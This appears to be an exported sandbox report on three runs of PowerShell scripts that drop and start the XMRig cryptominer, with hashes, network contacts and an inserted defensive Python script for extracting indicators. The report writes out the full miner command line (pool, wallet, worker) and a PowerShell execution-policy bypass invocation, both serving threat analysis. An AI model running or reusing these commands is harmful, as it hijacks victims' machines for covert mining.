memory/4568-129-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-130-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-131-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-132-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-133-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-134-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-135-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-136-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-137-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-138-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-139-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-140-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-141-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-142-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-143-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-144-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-145-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-146-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-147-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-148-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-149-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-150-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-151-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-152-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-153-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-154-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-155-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-156-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-157-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; every field exported as N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
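
The xmrig.exe command line above is the most useful artefact in this run: `-a rx` selects RandomX (which is why the signatures show xmrig requesting SeLockMemoryPrivilege, the privilege it needs for large pages), `-o stratum+ssl://rx.unmineable.com:443` puts the pool traffic inside TLS on 443 so it blends with ordinary HTTPS, and the `-u` value follows unMineable's `COIN:ADDRESS.WORKER` convention, so the wallet and worker name can be lifted straight out of it. The script below is an added example, not part of the sandbox report and not XMRig's own code. It uses only the Python standard library, copies the command line and the file hashes exactly as this run prints them, and the names `parse_xmrig_cmdline`, `classify_file` and `triage` are the example's own. The `__PSScriptPolicyTest_*.ps1` files are written by PowerShell itself to probe AppLocker/WDAC lockdown; the example keeps them out of the indicator list on purpose.

```python
"""Indicator extraction for the XMRig-via-PowerShell detonation.

Added example; it is not part of the sandbox report and not XMRig code.
It takes the xmrig.exe command line and the dropped-file hashes exactly as
the report lists them (copied inline below), turns the miner arguments into
blockable indicators, and separates PowerShell's own __PSScriptPolicyTest
artefacts from the actual payload so they do not end up on a blocklist.
"""
import hashlib
import re
import shlex
from urllib.parse import urlsplit

# Copied from the report (behavioral24): the miner command line and the
# MD5 the report records for the dropped xmrig.exe.
XMRIG_CMD = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" '
    "-a rx -o stratum+ssl://rx.unmineable.com:443 "
    "-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
    ".unmineable_worker_vilqtiac -p x"
)
XMRIG_MD5 = "205ad9eb6acd6f58752899669b69fe74"

# PowerShell writes __PSScriptPolicyTest_*.ps1 into %TEMP% to probe
# AppLocker/WDAC lockdown.  One variant is the single byte "1" (hashing it
# reproduces the report's c4ca4238a0b923820dcc509a6f75849b); the second MD5 is
# the other value the report shows for the same artefact and is used as-is.
PS_POLICY_TEST_MD5 = {hashlib.md5(b"1").hexdigest(), "d17fe0a3f47be24a6453e9ef58c94641"}
PS_POLICY_TEST_NAME = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)
# Monero standard address or subaddress: 95 base58 characters starting with 4 or 8.
MONERO_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def _value(tokens, i):
    """Value of option tokens[i], given either as '--opt=value' or as the next token."""
    if tokens[i].startswith("--") and "=" in tokens[i]:
        return tokens[i].split("=", 1)[1]
    return tokens[i + 1] if i + 1 < len(tokens) else ""


def parse_xmrig_cmdline(cmd):
    """Pull algorithm, pool, wallet and worker out of an xmrig command line."""
    # posix=False leaves Windows backslashes alone; quotes are stripped by hand.
    tokens = [t.strip('"') for t in shlex.split(cmd, posix=False)]
    info = {"image": tokens[0], "algo": None, "pool_url": None, "pool_host": None,
            "pool_port": None, "tls": False, "coin": None, "wallet": None,
            "worker": None, "password": None}
    user = None
    for i, tok in enumerate(tokens):
        name = tok.split("=", 1)[0]
        if name in ("-a", "--algo"):
            info["algo"] = _value(tokens, i)
        elif name in ("-o", "--url"):
            info["pool_url"] = _value(tokens, i)
        elif name in ("-u", "--user"):
            user = _value(tokens, i)
        elif name in ("-p", "--pass"):
            info["password"] = _value(tokens, i)
        elif name == "--tls":
            info["tls"] = True
    if info["pool_url"]:
        url = info["pool_url"] if "://" in info["pool_url"] else "stratum+tcp://" + info["pool_url"]
        parts = urlsplit(url)
        info["pool_host"], info["pool_port"] = parts.hostname, parts.port
        info["tls"] = info["tls"] or parts.scheme in ("stratum+ssl", "stratum+tls")
    if user:
        # unMineable convention is COIN:ADDRESS.WORKER; plain pools use ADDRESS.WORKER.
        coin, sep, rest = user.partition(":")
        if sep and coin.isalpha():
            info["coin"], user = coin.upper(), rest
        wallet, sep, worker = user.partition(".")
        info["wallet"], info["worker"] = wallet, (worker or None)
    return info


def looks_like_monero_address(s):
    return bool(MONERO_ADDRESS.match(s or ""))


def classify_file(path, md5):
    """Label a dropped file: PowerShell's own probe, the miner, or unknown."""
    md5 = md5.lower()
    if PS_POLICY_TEST_NAME.search(path) and md5 in PS_POLICY_TEST_MD5:
        return "powershell-policy-test"
    if md5 == XMRIG_MD5:
        return "xmrig-payload"
    return "unknown"


def triage(cmdlines, files):
    """Collect the indicators worth blocking or hunting on.

    cmdlines: process command lines from the report; files: (path, md5) pairs.
    """
    out = {"pool": set(), "wallets": set(), "workers": set(), "payload_md5": set(),
           "ignored": [], "unknown": []}
    for cmd in cmdlines:
        p = parse_xmrig_cmdline(cmd)
        if p["pool_host"]:  # only miner-style command lines name a pool
            out["pool"].add(f"{p['pool_host']}:{p['pool_port']}")
            if looks_like_monero_address(p["wallet"]):
                out["wallets"].add(p["wallet"])
            if p["worker"]:
                out["workers"].add(p["worker"])
    for path, md5 in files:
        kind = classify_file(path, md5)
        if kind == "xmrig-payload":
            out["payload_md5"].add(md5.lower())
        elif kind == "powershell-policy-test":
            out["ignored"].append(path)
        else:
            out["unknown"].append(path)
    return {k: (sorted(v) if isinstance(v, set) else v) for k, v in out.items()}


if __name__ == "__main__":
    # Rows constructed from this run's Processes and Files sections.
    summary = triage(
        [r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"',
         XMRIG_CMD],
        [(r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3amzkxw1.0hb.ps1", "d17fe0a3f47be24a6453e9ef58c94641"),
         (r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe", XMRIG_MD5)],
    )
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Run as-is it prints the pool endpoint, wallet, worker and payload hash, and lists the policy-test script under `ignored`. Because the pool connection is TLS on 443, the host name (DNS query or TLS SNI for rx.unmineable.com) is the network indicator to alert on, not the port; the wallet and worker string are the stable attacker identifiers, since the same pair appears in every run of this sample.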

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/4964-0-0x00007FFD8E3F3000-0x00007FFD8E3F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3amzkxw1.0hb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4964-9-0x000001ACF9ED0000-0x000001ACF9EF2000-memory.dmp

memory/4964-10-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-11-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-12-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-14-0x000001ACFA760000-0x000001ACFA772000-memory.dmp

memory/4964-15-0x000001ACFA4E0000-0x000001ACFA4EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1136-46-0x000001F1A1C50000-0x000001F1A1C70000-memory.dmp

memory/1136-47-0x000001F1A1CA0000-0x000001F1A1CC0000-memory.dmp

memory/1136-48-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/4964-50-0x00007FFD8E3F3000-0x00007FFD8E3F5000-memory.dmp

memory/1136-49-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/4964-51-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/1136-53-0x000001F1A1CC0000-0x000001F1A1CE0000-memory.dmp

memory/1136-52-0x000001F1A1CE0000-0x000001F1A1D00000-memory.dmp

memory/4964-54-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/1136-55-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-56-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-57-0x000001F1A1CE0000-0x000001F1A1D00000-memory.dmp

memory/1136-58-0x000001F1A1CC0000-0x000001F1A1CE0000-memory.dmp

memory/1136-59-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-60-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-61-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-62-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-63-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-64-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-65-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-66-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-67-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-68-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-69-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-70-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-71-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-72-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-73-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-74-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-75-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-76-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-77-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-78-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-79-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-80-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-81-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-82-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-83-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-84-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-85-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-86-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-87-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-88-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-89-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-90-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-91-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-92-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-93-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-94-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-95-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-96-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-97-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-98-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-99-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-100-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-101-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-102-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-103-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-104-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-105-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-106-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-107-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-108-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-109-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-110-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-111-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-112-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-113-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-114-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-115-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-116-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-117-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win11-20240426-en

Max time kernel

1795s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; every field exported as N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2812-0-0x00007FFF9C8F3000-0x00007FFF9C8F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kajt4zi.jqu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2812-10-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-9-0x0000018A6B5D0000-0x0000018A6B5F2000-memory.dmp

memory/2812-11-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-12-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-13-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-14-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-15-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-17-0x0000018A6B780000-0x0000018A6B792000-memory.dmp

memory/2812-18-0x0000018A6B770000-0x0000018A6B77A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1204-49-0x00000270FEE10000-0x00000270FEE30000-memory.dmp

memory/1204-50-0x00000270FF310000-0x00000270FF330000-memory.dmp

memory/1204-51-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-52-0x00000270FF330000-0x00000270FF350000-memory.dmp

memory/1204-53-0x00000270FF350000-0x00000270FF370000-memory.dmp

memory/1204-54-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-55-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-58-0x00000270FF350000-0x00000270FF370000-memory.dmp

memory/1204-57-0x00000270FF330000-0x00000270FF350000-memory.dmp

memory/1204-56-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-59-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-60-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-61-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-62-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-63-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-64-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-65-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-66-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-67-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-68-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-69-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-70-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-71-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-72-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-73-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-74-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-75-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-76-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-77-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-78-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-79-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-80-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-81-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-82-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-83-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-84-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-85-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-86-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-87-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-88-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-89-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-90-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-91-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-92-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-93-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-94-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-95-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-96-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-97-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-98-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-99-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-100-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-101-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-102-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-103-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-104-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-105-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-106-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-107-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-108-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-109-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-110-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-111-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-112-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-113-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-114-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-115-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-116-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-117-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(62 hits; every field exported as N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
